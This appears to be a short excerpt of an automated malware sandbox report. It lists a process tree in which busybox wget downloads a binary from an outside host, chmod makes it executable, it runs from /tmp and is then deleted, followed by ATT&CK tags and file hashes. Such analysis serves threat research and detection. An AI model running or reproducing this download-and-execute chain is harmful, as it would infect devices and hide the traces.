/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo./QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97